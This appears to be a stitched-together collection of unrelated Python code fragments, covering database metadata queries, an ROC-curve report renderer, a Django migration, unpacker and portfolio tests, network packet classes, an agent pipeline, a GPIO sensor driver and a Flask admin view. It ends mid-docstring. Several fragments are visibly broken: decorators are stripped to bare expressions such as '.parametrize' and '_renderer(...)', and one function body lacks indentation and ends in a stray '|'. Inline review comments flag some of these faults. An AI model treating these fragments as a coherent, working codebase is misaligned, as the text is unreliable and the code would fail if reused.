            st = self.execute_meta_nosql('getTables', {'schema': object_schema, 'table': object_name, 'tableTypes': ['VIEW']})
        else:
            st = self.execute_snapshot('\n SELECT 1\n FROM sys.exa_all_views\n WHERE view_schema={object_schema}\n AND view_name={object_name}\n ', {'object_schema': object_schema, 'object_name': object_name})
        return (st.rowcount() > 0)
    def list_schemas(self, schema_name_pattern='%'):
        """Return all schemas whose name matches the LIKE pattern."""
        st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_schemas\n WHERE schema_name LIKE {schema_name_pattern}\n ORDER BY schema_name ASC\n ', {'schema_name_pattern': schema_name_pattern})
        return st.fetchall()
    def list_tables(self, table_schema_pattern='%', table_name_pattern='%'):
        """Return all tables matching the schema and name LIKE patterns."""
        st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_tables\n WHERE table_schema LIKE {table_schema_pattern}\n AND table_name LIKE {table_name_pattern}\n ORDER BY table_schema ASC, table_name ASC\n ', {'table_schema_pattern': table_schema_pattern, 'table_name_pattern': table_name_pattern})
        return st.fetchall()
    def list_views(self, view_schema_pattern='%', view_name_pattern='%'):
        """Return all views matching the schema and name LIKE patterns."""
        st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_views\n WHERE view_schema LIKE {view_schema_pattern}\n AND view_name LIKE {view_name_pattern}\n ORDER BY view_schema ASC, view_name ASC\n ', {'view_schema_pattern': view_schema_pattern, 'view_name_pattern': view_name_pattern})
        return st.fetchall()
    def list_columns(self, column_schema_pattern='%', column_table_pattern='%', column_object_type_pattern='%', column_name_pattern='%'):
        """Return all columns matching the given LIKE patterns."""
        st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_columns\n WHERE column_schema LIKE {column_schema_pattern}\n AND column_table LIKE {column_table_pattern}\n AND column_object_type LIKE {column_object_type_pattern}\n AND column_name LIKE {column_name_pattern}\n ', {'column_schema_pattern': column_schema_pattern, 'column_table_pattern': column_table_pattern, 'column_object_type_pattern': column_object_type_pattern, 'column_name_pattern': column_name_pattern})
        return st.fetchall()
    def list_objects(self, object_name_pattern='%', object_type_pattern='%', owner_pattern='%', root_name_pattern='%'):
        """Return all database objects matching the given LIKE patterns."""
        st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_objects\n WHERE object_name LIKE {object_name_pattern}\n AND object_type LIKE {object_type_pattern}\n AND owner LIKE {owner_pattern}\n AND root_name LIKE {root_name_pattern}\n ', {'object_name_pattern': object_name_pattern, 'object_type_pattern': object_type_pattern, 'owner_pattern': owner_pattern, 'root_name_pattern': root_name_pattern})
        return st.fetchall()
    def list_object_sizes(self, object_name_pattern='%', object_type_pattern='%', owner_pattern='%', root_name_pattern='%'):
        """Return size information for objects matching the LIKE patterns."""
        st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_object_sizes\n WHERE object_name LIKE {object_name_pattern}\n AND object_type LIKE {object_type_pattern}\n AND owner LIKE {owner_pattern}\n AND root_name LIKE {root_name_pattern}\n ', {'object_name_pattern': object_name_pattern, 'object_type_pattern': object_type_pattern, 'owner_pattern': owner_pattern, 'root_name_pattern': root_name_pattern})
        return st.fetchall()
    def list_indices(self, index_schema_pattern='%', index_table_pattern='%', index_owner_pattern='%'):
        """Return all indices matching the given LIKE patterns."""
        st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_indices\n WHERE index_schema LIKE {index_schema_pattern}\n AND index_table LIKE {index_table_pattern}\n AND index_owner LIKE {index_owner_pattern}\n ', {'index_schema_pattern': index_schema_pattern, 'index_table_pattern': index_table_pattern, 'index_owner_pattern': index_owner_pattern})
        return st.fetchall()
    def list_sql_keywords(self):
        """Return the server's reserved SQL keywords, cached after first call."""
        if (not self.sql_keywords):
            if (self.connection.protocol_version() >= constant.PROTOCOL_V2):
                st = self.execute_meta_nosql('getKeywords')
                self.sql_keywords = [r['KEYWORD'] for r in st.fetchall() if (r['RESERVED'] is True)]
            else:
                st = self.execute_snapshot('\n SELECT keyword\n FROM EXA_SQL_KEYWORDS\n WHERE reserved IS TRUE\n ORDER BY keyword\n ')
                self.sql_keywords = st.fetchcol()
        return self.sql_keywords
    def execute_snapshot(self, query, query_params=None):
        """Run *query* with the snapshot-execution hint, fetching rows as dicts."""
        options = {'fetch_dict': True}
        return self.connection.cls_statement(self.connection, f'{self.snapshot_execution_hint}{query}', query_params, **options)
    def execute_meta_nosql(self, meta_command, meta_params=None):
        """Run a no-SQL metadata command (protocol v2+ only).

        Raises:
            ExaRuntimeError: if the protocol is too old or the command name
                does not start with the required 'get' prefix.
        """
        if (self.connection.protocol_version() < constant.PROTOCOL_V2):
            raise ExaRuntimeError(self.connection, 'Protocol version 2 is required to execute nosql meta data commands')
        if (meta_command[0:3] != 'get'):
            raise ExaRuntimeError(self.connection, "Meta command name should start with prefix 'get*'")
        options = {'fetch_dict': True}
        return self.connection.cls_statement(self.connection, meta_command, meta_params, meta_nosql=True, **options)
    def __repr__(self):
        return f'<{self.__class__.__name__} session_id={self.connection.session_id()}>'
# NOTE(review): this looks like a stripped `@default_renderer`-style class
# decorator; kept verbatim pending confirmation against the original file.
_renderer(wrap_type=TestRocAuc)
class TestRocAucRenderer(TestRenderer):
    """Renderer that adds per-label ROC curve plots to the ROC-AUC test HTML."""
    def render_html(self, obj: TestRocAuc) -> TestHtmlInfo:
        """Render the base test info and, when a current ROC curve exists,
        attach ROC plots — a single details pane for one label, tabs for many.
        """
        info = super().render_html(obj)
        # Fetch the metric result once instead of calling get_result() twice.
        roc_result = obj._roc_curve.get_result()
        curr_roc_curve: Optional[ROCCurve] = roc_result.current_roc_curve
        ref_roc_curve: Optional[ROCCurve] = roc_result.reference_roc_curve
        if curr_roc_curve is None:
            # Nothing to plot without a current-data ROC curve.
            return info
        tab_data = get_roc_auc_tab_data(curr_roc_curve, ref_roc_curve, color_options=self.color_options)
        if len(tab_data) == 1:
            return info.with_details('ROC Curve', tab_data[0][1])
        tabs = [TabData(name, widget) for (name, widget) in tab_data]
        return info.with_details('', widget_tabs(title='', tabs=tabs))
class Migration(migrations.Migration):
    """Copy rpt.transaction_search rows into FABS/FPDS temp tables.

    The reverse SQL truncates the temp tables inside a DO block that
    swallows errors, so rolling back never fails even if the tables are
    missing. A data-volume guard runs first via check_data_load_limit.
    """
    dependencies = [('search', '0021_partition_transaction_search_pt1_index_prep_and_tables')]
    # Order matters: validate the load size first, then split rows by is_fpds.
    operations = [migrations.RunPython(code=check_data_load_limit, reverse_code=migrations.RunPython.noop), migrations.RunSQL(sql='\n INSERT INTO temp.transaction_search_fabs_temp\n SELECT * FROM rpt.transaction_search WHERE is_fpds = FALSE;\n ', reverse_sql='\n DO\n $$\n BEGIN\n TRUNCATE temp.transaction_search_fabs_temp;\n EXCEPTION\n WHEN OTHERS THEN\n NULL; -- ignore error\n END\n $$\n ;\n '), migrations.RunSQL(sql='\n INSERT INTO temp.transaction_search_fpds_temp\n SELECT * FROM rpt.transaction_search WHERE is_fpds = TRUE;\n ', reverse_sql='\n DO\n $$\n BEGIN\n TRUNCATE temp.transaction_search_fpds_temp;\n EXCEPTION\n WHEN OTHERS THEN\n NULL; -- ignore error\n END\n $$\n ;\n ')]
class TestLinuxKernelUnpacker(TestUnpackerBase):
    """Tests for the Linux-kernel bzImage unpacker plugin."""
    def test_unpacker_selection_generic(self):
        """The 'linux/kernel' MIME type must map to the LinuxKernel plugin."""
        self.check_unpacker_selection('linux/kernel', 'LinuxKernel')
    # NOTE(review): decorator appears truncated in this view — presumably
    # `@pytest.mark.parametrize`; confirm against the original file.
    .parametrize('input_file, expected', [('bzImage_bzip2', 'vmlinux_BZIP_17001'), ('bzImage_gzip', 'vmlinux_GZIP_17001'), ('bzImage_lz4', 'vmlinux_LZ4_17001'), ('bzImage_lzma', 'vmlinux_LZMA_17001'), ('bzImage_lzo', 'vmlinux_LZOP_17001'), ('bzImage_xz', 'vmlinux_XZ_17001')])
    def test_extraction_valid_bz_image(self, input_file, expected):
        """Each supported compression variant must extract exactly one vmlinux."""
        (files, _) = self.unpacker.extract_files_from_file(str((TEST_DATA_DIR / input_file)), self.tmp_dir.name)
        assert (files == [str((Path(self.tmp_dir.name) / expected))])
    def test_extraction_invalid_image(self):
        """A bogus image must yield no extracted files."""
        (files, _) = self.unpacker.extract_files_from_file(str((TEST_DATA_DIR / 'bogus_image.bin')), self.tmp_dir.name)
        assert (files == [])
class LittleLegionHoldAction(UserAction):
    """'Hold' skill effect: the source player draws one card and skips the
    drop-card stage of the current turn."""
    def apply_action(self):
        """Draw a card for the source, then best-effort remove DropCardStage
        from the current turn's pending stages. Always returns True."""
        src = self.source
        g = self.game
        g.process_action(DrawCards(src, 1))
        turn = PlayerTurn.get_current(g)
        try:
            # Best effort: the stage may already be absent or removed.
            # NOTE(review): the broad `except Exception` also hides unrelated
            # failures; list.remove would only raise ValueError — confirm the
            # type of pending_stages before narrowing.
            turn.pending_stages.remove(DropCardStage)
        except Exception:
            pass
        return True
class RegisterDialogue(BaseRegisterDialogue):
    """Concrete register dialogue that forwards construction to the base."""
    def __init__(self, dialogue_label: DialogueLabel, self_address: Address, role: BaseDialogue.Role, message_class: Type[RegisterMessage]) -> None:
        """Initialize via the base class with all arguments passed through.

        :param dialogue_label: identifier of this dialogue.
        :param self_address: address of the entity owning the dialogue.
        :param role: this agent's role in the dialogue.
        :param message_class: message class used within the dialogue.
        """
        BaseRegisterDialogue.__init__(self, dialogue_label=dialogue_label, self_address=self_address, role=role, message_class=message_class)
def get_contract_from_blockchain(address, key_file=None):
    """Download a verified contract's source from the block-explorer API and
    write it to ``contract_dir``, returning that path.

    NOTE(review): ``contract_dir`` is not defined in this function, so it
    must come from module scope — confirm it exists there, otherwise this
    raises NameError at runtime.
    """
    key = get_api_key(key_file)
    api = Contract(address=address, api_key=key)
    sourcecode = api.get_sourcecode()
    # get_sourcecode() returns a list of records; only the first is written.
    with open(contract_dir, 'w') as contract_file:
        contract_file.write(sourcecode[0]['SourceCode'])
    return contract_dir
# Register the distributive rewrite for node types over whose children the
# double-transpose elimination distributes.
# NOTE(review): these read like stacked `@_drop_double_transpose.register(...)`
# decorator lines whose '@' was stripped in this view — as plain statements
# the returned registering decorator is discarded; confirm against the
# original file.
_drop_double_transpose.register(Negative)
_drop_double_transpose.register(Add)
_drop_double_transpose.register(Mul)
_drop_double_transpose.register(Solve)
_drop_double_transpose.register(Inverse)
_drop_double_transpose.register(DiagonalTensor)
_drop_double_transpose.register(Reciprocal)
def _drop_double_transpose_distributive(expr, self):
    """Rebuild *expr* of the same type with the rewrite applied to each child."""
    return type(expr)(*map(self, expr.children))
def _remove_no_op_expands(sorted_graph: List[Tensor]) -> List[Tensor]:
    """Remove `expand` ops that keep every dimension unchanged.

    For each no-op expand (all dim_types are KEEP_DIM), rewires the expand's
    consumers to read from its input directly and drops the expand output
    tensor, then sanitizes the graph. Expands whose output is a graph output
    are left in place.
    """
    ops = graph_utils.get_sorted_ops(sorted_graph)
    for op in ops:
        if (op._attrs['op'] != 'expand'):
            continue
        outputs = op._attrs['outputs']
        assert (len(outputs) == 1), 'expand must only have 1 output'
        expand_output = outputs[0]
        if expand_output._attrs['is_output']:
            # Graph outputs must keep their producing op.
            continue
        inputs = op._attrs['inputs']
        assert (len(inputs) >= 1), 'expand must have at least 1 input'
        expand_input = inputs[0]
        assert (len(op._attrs['dim_types']) == len(expand_output._attrs['shape'])), 'expand must have dim_type for every output dimension'
        if any(((dt != ExpandDimensionType.KEEP_DIM) for dt in op._attrs['dim_types'])):
            # At least one dimension is actually expanded: not a no-op.
            continue
        # Propagate the (identical) output shape onto the input so symbolic
        # dims stay consistent, then bypass the expand for all consumers.
        expand_input._attrs['shape'] = expand_output._attrs['shape']
        for dst in list(expand_output.dst_ops()):
            transform_utils.replace_tensor_for_op(dst, expand_output, expand_input)
        transform_utils.remove_tensor_from_sorted_graph(expand_output)
    return transform_utils.sanitize_sorted_graph(sorted_graph)
def _validate_map(datum, schema, named_schemas, parent_ns, raise_errors, options):
return (isinstance(datum, Mapping) and all((isinstance(k, str) for k in datum)) and all((_validate(datum=v, schema=schema['values'], named_schemas=named_schemas, field=parent_ns, raise_errors=raise_errors, options=options) for v in datum.values()))) |
class CommandsTestCase(TestCase):
    """Tests for the import_qof_prevalence management command."""
    def test_import_qof_prevalence(self):
        """Importing the fixture CSVs must create 24 QOF prevalence rows for
        both the CCG and the practice, with the expected dementia register
        sizes."""
        args = []
        fixture_dir = 'frontend/tests/fixtures/commands/'
        opts = {'by_ccg': (fixture_dir + 'prevalencebyccg.csv'), 'by_practice': (fixture_dir + 'prevalencebyprac.csv'), 'start_year': 2013}
        call_command('import_qof_prevalence', *args, **opts)
        # CCG-level rows.
        ccg = PCT.objects.get(code='00C')
        qof_for_ccg = QOFPrevalence.objects.filter(pct=ccg)
        self.assertEqual(qof_for_ccg.count(), 24)
        qof_dementia = qof_for_ccg.get(indicator_group='DEM')
        self.assertEqual(qof_dementia.disease_register_size, 977)
        # Practice-level rows.
        practice = Practice.objects.get(code='A81002')
        qof_for_practice = QOFPrevalence.objects.filter(practice=practice)
        self.assertEqual(qof_for_practice.count(), 24)
        qof_dementia = qof_for_practice.get(indicator_group='DEM')
        self.assertEqual(qof_dementia.disease_register_size, 171)
def test_doc_empty_overwrite_type_bound_procedure_fun():
    """Hover over an overridden type-bound procedure must show the override's
    docstring parts at both request positions."""
    string = write_rpc_request(1, 'initialize', {'rootPath': str(test_dir)})
    file_path = ((test_dir / 'subdir') / 'test_free.f90')
    # Two hover positions on the same line: procedure name and binding.
    string += hover_request(file_path, 22, 17)
    string += hover_request(file_path, 22, 32)
    (errcode, results) = run_request(string)
    assert (errcode == 0)
    check_return(results[1], ((0, '-----'), (1, 'Doc 3 '), (2, ''), (3, '**Return:** '), (4, '`norm`return value docstring')), True)
    check_return(results[2], ((0, '-----'), (1, 'Top level docstring '), (2, ''), (3, '**Parameters:** '), (4, '`self` self value docstring '), (5, ''), (6, '**Return:** '), (7, '`norm`return value docstring')), True)
def has_reference(fname1, fname2):
    """Return True if either file's content mentions the other's basename.

    Both files are read as UTF-8; an undecodable file is reported on stderr
    and treated as containing no reference.
    """
    try:
        with open(url_to_fname(fname1), encoding='UTF-8') as first, \
                open(url_to_fname(fname2), encoding='UTF-8') as second:
            text_one = first.read()
            text_two = second.read()
    except UnicodeDecodeError as exc:
        print(f'UnicodeDecodeError: {exc}', file=sys.stderr)
        return False
    return basename(fname1) in text_two or basename(fname2) in text_one
def test_buildPF_pass_1():
    """build_portfolio with the second passing fixture must yield a complete
    Portfolio: stocks, aligned data columns, matching weights, and a working
    properties() call."""
    d = d_pass[1]
    pf = build_portfolio(**d)
    assert isinstance(pf, Portfolio)
    assert isinstance(pf.get_stock(names_yf[0]), Stock)
    assert isinstance(pf.data, pd.DataFrame)
    assert isinstance(pf.portfolio, pd.DataFrame)
    # One data column per stock, in the fixture's order, indexed by Date.
    assert (len(pf.stocks) == len(pf.data.columns))
    assert (pf.data.columns.tolist() == names_yf)
    assert (pf.data.index.name == 'Date')
    assert (pf.portfolio == df_pf2_yf).all().all()
    # Computed weights must match the expected weights within tolerance.
    assert ((pf.comp_weights() - weights_no_df_pf) <= strong_abse).all()
    # Smoke-check that the summary printer runs without raising.
    pf.properties()
# NOTE(review): marker appears truncated in this view — presumably
# `@pytest.mark.unit_saas`; confirm against the original file.
.unit_saas
def test_saas_request_without_method_or_path():
    """SaaSRequest validation must reject a request missing its method or path."""
    with pytest.raises(ValidationError) as exc:
        SaaSRequest(path='/test')
    assert ('A request must specify a method' in str(exc.value))
    with pytest.raises(ValidationError) as exc:
        SaaSRequest(method='GET')
    assert ('A request must specify a path' in str(exc.value))
class OptionPlotoptionsArearangeStatesHover(Options):
    """Config proxy for ``plotOptions.arearange.states.hover``.

    NOTE(review): scalar options appear twice (getter then setter); the
    ``@property`` / ``@<name>.setter`` decorators are presumably stripped in
    this view — confirm against the generated original.
    """
    def animation(self) -> 'OptionPlotoptionsArearangeStatesHoverAnimation':
        """Sub-options for the hover-state animation."""
        return self._config_sub_data('animation', OptionPlotoptionsArearangeStatesHoverAnimation)
    def enabled(self):
        """Getter: whether the hover state is enabled (default True)."""
        return self._config_get(True)
    def enabled(self, flag: bool):
        """Setter: whether the hover state is enabled."""
        self._config(flag, js_type=False)
    def halo(self) -> 'OptionPlotoptionsArearangeStatesHoverHalo':
        """Sub-options for the hover halo."""
        return self._config_sub_data('halo', OptionPlotoptionsArearangeStatesHoverHalo)
    def lineWidth(self):
        """Getter: absolute line width on hover (default None)."""
        return self._config_get(None)
    def lineWidth(self, num: float):
        """Setter: absolute line width on hover."""
        self._config(num, js_type=False)
    def lineWidthPlus(self):
        """Getter: line-width increase on hover (default 1)."""
        return self._config_get(1)
    def lineWidthPlus(self, num: float):
        """Setter: line-width increase on hover."""
        self._config(num, js_type=False)
    def marker(self) -> 'OptionPlotoptionsArearangeStatesHoverMarker':
        """Sub-options for the hover-state marker."""
        return self._config_sub_data('marker', OptionPlotoptionsArearangeStatesHoverMarker)
class bsn_forward_error_correction(bsn):
    """Big Switch Networks experimenter message: forward-error-correction state.

    Carries the configured FEC state and whether FEC is currently enabled.

    NOTE(review): this reads like generated Python-2-era loxi code —
    ``pack`` joins struct-packed chunks with ``''.join`` (a *str* join over
    bytes, which fails under Python 3) and ``unpack`` lacks ``self``
    (presumably a stripped ``@staticmethod``); confirm against the generator
    output before changing anything.
    """
    # Experimenter message type constant.
    type = 65535
    # BSN experimenter ID.
    experimenter = 6035143
    exp_type = 2
    def __init__(self, configured=None, enabled=None):
        """Initialize with optional configured/enabled values (default 0)."""
        if (configured != None):
            self.configured = configured
        else:
            self.configured = 0
        if (enabled != None):
            self.enabled = enabled
        else:
            self.enabled = 0
        return
    def pack(self):
        """Serialize to wire format; the length field (slot 1) is back-patched
        after the total size is known."""
        packed = []
        packed.append(struct.pack('!H', self.type))
        packed.append(struct.pack('!H', 0))
        packed.append(struct.pack('!L', self.experimenter))
        packed.append(struct.pack('!L', self.exp_type))
        packed.append(struct.pack('!L', self.configured))
        packed.append(struct.pack('!L', self.enabled))
        length = sum([len(x) for x in packed])
        packed[1] = struct.pack('!H', length)
        return ''.join(packed)
    def unpack(reader):
        """Parse a message from *reader*, validating the fixed fields."""
        obj = bsn_forward_error_correction()
        _type = reader.read('!H')[0]
        assert (_type == 65535)
        _length = reader.read('!H')[0]
        # Bound further reads to this message's declared length.
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        _experimenter = reader.read('!L')[0]
        assert (_experimenter == 6035143)
        _exp_type = reader.read('!L')[0]
        assert (_exp_type == 2)
        obj.configured = reader.read('!L')[0]
        obj.enabled = reader.read('!L')[0]
        return obj
    def __eq__(self, other):
        """Equality over the two payload fields (type must match exactly)."""
        if (type(self) != type(other)):
            return False
        if (self.configured != other.configured):
            return False
        if (self.enabled != other.enabled):
            return False
        return True
    def pretty_print(self, q):
        """Write a human-readable rendering to pretty-printer *q*, naming
        known FEC config states."""
        q.text('bsn_forward_error_correction {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('configured = ')
                value_name_map = {0: 'OFP_BSN_FEC_CONFIG_STATE_UNSET', 1: 'OFP_BSN_FEC_CONFIG_STATE_ENABLED', 2: 'OFP_BSN_FEC_CONFIG_STATE_DISABLED'}
                if (self.configured in value_name_map):
                    q.text(('%s(%d)' % (value_name_map[self.configured], self.configured)))
                else:
                    q.text(('%#x' % self.configured))
                q.text(',')
                q.breakable()
                q.text('enabled = ')
                q.text(('%#x' % self.enabled))
            q.breakable()
        q.text('}')
class loopback(operation):
    """CFM loopback message (LBM/LBR) with a transaction ID and optional TLVs."""
    # Header layout: md_lv/version byte, opcode, flags, TLV offset, transaction id.
    _PACK_STR = '!4BI'
    _MIN_LEN = struct.calcsize(_PACK_STR)
    _TLV_OFFSET = 4
    def __init__(self, md_lv, version, transaction_id, tlvs):
        """Build a loopback op; flags are always zero for loopback."""
        super(loopback, self).__init__(md_lv, version, tlvs)
        self._flags = 0
        self.transaction_id = transaction_id
    def parser(cls, buf):
        """Parse *buf* into a loopback instance.

        NOTE(review): takes ``cls`` but no decorator is visible here —
        presumably a stripped ``@classmethod``; confirm against the original.
        """
        (md_lv_version, opcode, flags, tlv_offset, transaction_id) = struct.unpack_from(cls._PACK_STR, buf)
        # md_lv lives in the top 3 bits, version in the low 5.
        md_lv = int((md_lv_version >> 5))
        version = int((md_lv_version & 31))
        tlvs = cls._parser_tlvs(buf[cls._MIN_LEN:])
        return cls(md_lv, version, transaction_id, tlvs)
    def serialize(self):
        """Serialize header plus TLVs; a CFM end-TLV terminates any TLV list."""
        buf = struct.pack(self._PACK_STR, ((self.md_lv << 5) | self.version), self._opcode, self._flags, self._TLV_OFFSET, self.transaction_id)
        buf = bytearray(buf)
        if self.tlvs:
            buf.extend(self._serialize_tlvs(self.tlvs))
            buf.extend(struct.pack('!B', CFM_END_TLV))
        return buf
    def __len__(self):
        return self._calc_len(self._MIN_LEN)
def get_roc_auc_tab_data(curr_roc_curve: ROCCurve, ref_roc_curve: Optional[ROCCurve], color_options: ColorOptions) -> List[Tuple[(str, BaseWidgetInfo)]]:
    """Build one (label, widget) plot per class label for ROC curves.

    Each figure has one column for current data and, when a reference curve
    is supplied, a second column for reference data with a shared y-axis.
    """
    additional_plots = []
    cols = 1
    subplot_titles = ['']
    if (ref_roc_curve is not None):
        cols = 2
        subplot_titles = ['current', 'reference']
    for label in curr_roc_curve.keys():
        fig = make_subplots(rows=1, cols=cols, subplot_titles=subplot_titles, shared_yaxes=True)
        trace = go.Scatter(x=curr_roc_curve[label].fpr, y=curr_roc_curve[label].tpr, mode='lines', name='ROC', legendgroup='ROC', marker=dict(size=6, color=color_options.get_current_data_color()))
        fig.add_trace(trace, 1, 1)
        fig.update_xaxes(title_text='False Positive Rate', row=1, col=1)
        if (ref_roc_curve is not None):
            # NOTE(review): the reference trace is also drawn with
            # get_current_data_color(); a reference-data color seems intended
            # here — confirm against ColorOptions before changing.
            trace = go.Scatter(x=ref_roc_curve[label].fpr, y=ref_roc_curve[label].tpr, mode='lines', name='ROC', legendgroup='ROC', showlegend=False, marker=dict(size=6, color=color_options.get_current_data_color()))
            fig.add_trace(trace, 1, 2)
            fig.update_xaxes(title_text='False Positive Rate', row=1, col=2)
        fig.update_layout(yaxis_title='True Positive Rate', showlegend=True)
        additional_plots.append((str(label), plotly_figure(title='', figure=fig)))
    return additional_plots
def test_attach_external_modules_that_do_not_inherit_from_module_class(module1_unique, module2_unique, module3_unique, module4_unique):
    """External modules (and nested submodules) need not subclass Module."""
    external_modules = {
        'module1': module1_unique,
        'module2': (module2_unique, {'submodule1': (module3_unique, {'submodule2': module4_unique})}),
    }
    w3 = Web3(EthereumTesterProvider(), external_modules=external_modules)
    # Flat module attributes and methods are reachable.
    assert hasattr(w3, 'module1')
    assert w3.module1.a == 'a'
    assert w3.module1.b() == 'b'
    assert w3.module1.return_eth_chain_id == w3.eth.chain_id
    # Nested modules are attached recursively.
    assert hasattr(w3, 'module2')
    assert w3.module2.c == 'c'
    assert w3.module2.d() == 'd'
    assert hasattr(w3.module2, 'submodule1')
    assert w3.module2.submodule1.e == 'e'
    assert hasattr(w3.module2.submodule1, 'submodule2')
    assert w3.module2.submodule1.submodule2.f == 'f'
    # Default modules stay attached and functional.
    assert hasattr(w3, 'geth')
    assert hasattr(w3, 'eth')
    assert is_integer(w3.eth.chain_id)
class AgentPipeline(GenericAgent):
    """Chain several agents so each module consumes the previous module's
    output; the pipeline's source/target types are those of the first and
    last modules.
    """

    # Class-level spec of module classes; used by add_args/from_args.
    pipeline: List = []

    def __init__(self, module_list: List[GenericAgent]) -> None:
        self.module_list = module_list
        self.check_pipeline_types()

    def check_pipeline_types(self):
        """Validate that adjacent modules have compatible data types.

        BUG FIX: this previously gated and indexed on ``self.pipeline`` (the
        class-level spec, empty by default), so pipelines constructed
        directly from ``module_list`` were never validated; check the actual
        module instances instead. Also balances the error message's closing
        parenthesis.
        """
        if (len(self.module_list) > 1):
            for i in range(1, len(self.module_list)):
                if (self.module_list[i].source_type != self.module_list[(i - 1)].target_type):
                    raise RuntimeError(f'{self.module_list[i]}.source_type({self.module_list[i].source_type}) != {self.module_list[(i - 1)]}.target_type({self.module_list[(i - 1)].target_type})')

    def source_type(self) -> Optional[str]:
        # NOTE(review): used like an attribute elsewhere — presumably a
        # stripped @property; confirm upstream.
        return self.module_list[0].source_type

    def target_type(self) -> Optional[str]:
        # NOTE(review): presumably a stripped @property; confirm upstream.
        return self.module_list[(- 1)].target_type

    def reset(self) -> None:
        """Reset every module in the pipeline."""
        for module in self.module_list:
            module.reset()

    def build_states(self) -> List[AgentStates]:
        return [module.build_states() for module in self.module_list]

    def push(self, segment: Segment, states: Optional[List[Optional[AgentStates]]]=None, upstream_states: Optional[List[Optional[AgentStates]]]=None) -> None:
        """Run every module but the last through pushpop, then push the
        resulting segment into the last module.

        Each intermediate module also receives the states of all preceding
        modules via ``upstream_states``.
        """
        if (states is None):
            states = [None for _ in self.module_list]
            states_list = [module.states for module in self.module_list]
        else:
            assert (len(states) == len(self.module_list))
            states_list = states
        if (upstream_states is None):
            upstream_states = []
        for (index, module) in enumerate(self.module_list[:(- 1)]):
            # Intermediate modules may overwrite the segment config; restore
            # it so downstream modules see the original config.
            config = segment.config
            segment = module.pushpop(segment, states[index], upstream_states=(upstream_states + states_list[:index]))
            segment.config = config
        self.module_list[(- 1)].push(segment, states[(- 1)], upstream_states=(upstream_states + states_list[:(len(self.module_list) - 1)]))

    def pop(self, states: Optional[List[Optional[AgentStates]]]=None) -> Segment:
        """Pop a segment from the last module (using its states if given)."""
        if (states is None):
            last_states = None
        else:
            assert (len(states) == len(self.module_list))
            last_states = states[(- 1)]
        return self.module_list[(- 1)].pop(last_states)

    def add_args(cls, parser) -> None:
        # NOTE(review): takes ``cls`` — presumably a stripped @classmethod.
        for module_class in cls.pipeline:
            module_class.add_args(parser)

    def from_args(cls, args):
        # NOTE(review): takes ``cls`` — presumably a stripped @classmethod.
        assert (len(cls.pipeline) > 0)
        return cls([module_class.from_args(args) for module_class in cls.pipeline])

    def __repr__(self) -> str:
        pipline_str = '\n\t'.join(('\t'.join(str(module).splitlines(True)) for module in self.module_list))
        return f'{self.__class__.__name__}(\n\t{pipline_str}\n)'

    def __str__(self) -> str:
        return self.__repr__()
class TimeTreeTracer(Tracer):
    """Tracer that accumulates CPU and wall time in a tree of labelled nodes."""

    def __init__(self, instance, verbosity=False, root_label='root', start_clocks=False, max_depth=1024):
        """Create the root node; optionally start its clocks immediately."""
        Tracer.__init__(self, instance, verbosity, max_depth)
        self.trace = Node(root_label)
        self.current = self.trace
        if start_clocks:
            self.reenter()

    def enter(self, label, **kwds):
        """Descend into (or create) child node ``label`` and start its clocks."""
        self.current = self.current.child(label)
        self.reenter()

    def reenter(self, **kwds):
        """Start (or resume) clocks on the current node.

        Clocks are stored as negated start stamps folded into an Accumulator;
        ``exit`` later adds the end stamps, so the accumulated sum equals the
        elapsed time.
        """
        if (self.current is None):
            self.current = self.trace
        node = self.current
        node.data['cputime'] = (node.data.get('cputime', 0) + Accumulator((- process_time()), repr='sum', count=False))
        node.data['walltime'] = (node.data.get('walltime', 0) + Accumulator((- time.time()), repr='sum', count=False))

    def exit(self, **kwds):
        """Stop clocks on the current node, optionally print it, and pop."""
        node = self.current
        node.data['cputime'] += process_time()
        node.data['walltime'] += time.time()
        if (self.verbosity and (self.verbosity >= self.current.level)):
            print(self.current)
        self._pop()
class Sensor(GenericSensor):
    """HC-SR04 ultrasonic range sensors driven through Raspberry Pi GPIO."""

    SENSOR_SCHEMA: CerberusSchemaType = {'pin_echo': {'type': 'integer', 'required': True, 'empty': False}, 'pin_trigger': {'type': 'integer', 'required': True, 'empty': False}, 'burst': {'type': 'integer', 'required': True, 'empty': False}}

    def setup_module(self) -> None:
        """Initialise the GPIO library (BCM numbering) and the sensor map."""
        # Imported lazily so the module can be loaded on non-Pi hosts.
        import RPi.GPIO as GPIO
        GPIO.setmode(GPIO.BCM)
        self.gpio = GPIO
        self.sensors: Dict[(str, HCSR04)] = {}

    def setup_sensor(self, sens_conf: ConfigType) -> None:
        """Create an HCSR04 driver from the config and register it by name."""
        device = HCSR04(gpio=self.gpio, **sens_conf)
        self.sensors[device.name] = device

    def get_value(self, sens_conf: ConfigType) -> SensorValueType:
        """Measure and return the range from the named sensor."""
        return self.sensors[sens_conf['name']].measure_range()

    def cleanup(self) -> None:
        """Release all GPIO resources."""
        self.gpio.cleanup()
class EditGroup(MethodView):
    """Admin view for editing an existing group (GET form / POST save)."""

    decorators = [allows.requires(IsAdmin, on_fail=FlashAndRedirect(message=_('You are not allowed to modify groups.'), level='danger', endpoint='management.overview'))]
    form = EditGroupForm

    def get(self, group_id):
        """Render the edit form for the requested group (404 if missing)."""
        group = Group.query.filter_by(id=group_id).first_or_404()
        form = self.form(group)
        return render_template('management/group_form.html', form=form, title=_('Edit Group'))

    def post(self, group_id):
        """Validate the submitted form and persist changes to the group."""
        group = Group.query.filter_by(id=group_id).first_or_404()
        # CONSISTENCY FIX: use the class-level ``form`` attribute like ``get``
        # does, instead of hard-coding EditGroupForm (subclasses overriding
        # ``form`` were silently ignored on POST).
        form = self.form(group)
        if form.validate_on_submit():
            form.populate_obj(group)
            group.save()
            if group.guest:
                # Guest permissions are cached; invalidate the stale cache.
                Guest.invalidate_cache()
            flash(_('Group updated.'), 'success')
            return redirect(url_for('management.groups', group_id=group.id))
        return render_template('management/group_form.html', form=form, title=_('Edit Group'))
def get_bug_traqs_lists_from_online_mode(bid_list):
    """Parse JSON vulnerability records into batches of BID sets.

    Returns ``(output_array, extended_info_array)``: ``output_array`` holds
